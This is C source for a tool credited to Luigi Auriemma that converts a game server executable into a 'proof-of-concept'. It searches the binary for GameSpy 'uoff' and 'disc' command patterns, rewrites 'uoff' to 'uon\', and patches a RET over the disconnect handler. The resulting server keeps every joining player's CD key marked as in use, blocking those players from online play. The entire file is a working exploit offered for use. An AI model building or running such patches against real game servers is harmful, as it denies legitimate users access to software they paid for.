/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/stat.h>

typedef unsigned char   u_char;
typedef unsigned int    u_int;



#define VER     "0.1"
#define DYN     0x90



void dobackup(u_char *fname);
u_int gsfind(const u_char *data, int len);
int check_bytes(u_char *data, const u_char *check, int size);
void patch_bytes(FILE *fd, const u_char *patch, int size);
void std_err(void);



u_int   bufflen;
u_char  *buff;



int main(int argc, char *argv[]) {
    FILE    *fd;
    struct stat xstat;
    u_int   off1,
            off2;
    u_char  *p;

    const static u_char
            uoff[] = {
                'u',  DYN, DYN, DYN, DYN,
                'o',  DYN, DYN, DYN, DYN,
                'f',  DYN, DYN, DYN, DYN,
                'f',  DYN, DYN, DYN, DYN
            },
            uon[] = {
                'u',  DYN, DYN, DYN, DYN,
                'o',  DYN, DYN, DYN, DYN,
                'n',  DYN, DYN, DYN, DYN,
                '\\', DYN, DYN, DYN, DYN
            },
            disc[] = {
                'i',  DYN, DYN, DYN, DYN,
                's',  DYN, DYN, DYN, DYN,
                'c',  DYN, DYN, DYN, DYN
            },
            drop_disc[] = {
                0x81, 0xec, DYN, DYN, 0, 0x00
            };


    setbuf(stdout, NULL);

    printf("\n"
        "Universal \"Gamespy cd-key in use\" executable-2-PoC converter "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n");

    if(argc < 2) {
        printf("\n"
            "Usage: %s <game.EXE>\n"
            "\n", argv[0]);
        exit(1);
    }

    printf("- open file %s\n", argv[1]);
    fd = fopen(argv[1], "r+b");
    if(!fd) std_err();
    fstat(fileno(fd), &xstat);
    bufflen = xstat.st_size;
    buff = malloc(bufflen);
    if(!buff) std_err();
    if(!fread(buff, bufflen, 1, fd)) std_err();

    off1 = gsfind(uoff, sizeof(uoff) - 1);
    off2 = gsfind(disc, sizeof(disc) - 1);

    if(!off1 || !off2) {
        printf(
            "- the uoff and disc commands have not been found\n"
            "  Is not possible to convert your executable in a proof-of-concept\n"
            "\n");
        goto end;
    }

    dobackup(argv[1]);

    printf("- offset \"uoff\":   0x%08x\n", off1);
    fseek(fd, off1, SEEK_SET);
    patch_bytes(fd, uon, sizeof(uon) - 1);

    for(p = buff + off2; p != buff; p--) {
        if(check_bytes(p, drop_disc, sizeof(drop_disc) - 1)) {
            off2 = p - buff;
            break;
        }
    }
    printf("- drop \"disc\":     0x%08x\n", off2);
    fseek(fd, off2, SEEK_SET);
    fputc(0xc3, fd);    // place a RET

    printf(
        "- Executable successfully patched!!!\n"
        "  Now it is a full working proof-of-concept which keeps in use the cd-keys of\n"
        "  all the gamers that joins in it for all the time your server is online\n"
        "\n");

end:
    free(buff);
    fclose(fd);
    return(0);
}



void dobackup(u_char *fname) {
    FILE    *fd;
    u_char  *tmp;

    tmp = malloc(strlen(fname) + 5);
    sprintf(tmp, "%s.bak", fname);

    printf("- create backup file %s\n", tmp);
    fd = fopen(tmp, "wb");
    if(!fd) std_err();
    if(!fwrite(buff, bufflen, 1, fd)) std_err();
    fclose(fd);

    free(tmp);
}



u_int gsfind(const u_char *data, int len) {
    u_char  *p,
            *l = buff + bufflen - len;

    for(p = buff; p != l; p++) {
        if(check_bytes(p, data, len)) return(p - buff);
    }
    return(0);
}



int check_bytes(u_char *data, const u_char *check, int size) {
    for(; size--; data++, check++) {
        if(*check == DYN) continue;
        if(*data != *check) return(0);
    }
    return(1);
}



void patch_bytes(FILE *fd, const u_char *patch, int size) {
    while(size--) {
        if(*patch == DYN) {
            fseek(fd, 1, SEEK_CUR);
        } else {
            fputc(*patch, fd);
        }
        patch++;
    }
}



void std_err(void) {
    perror("\nError");
    exit(1);
}


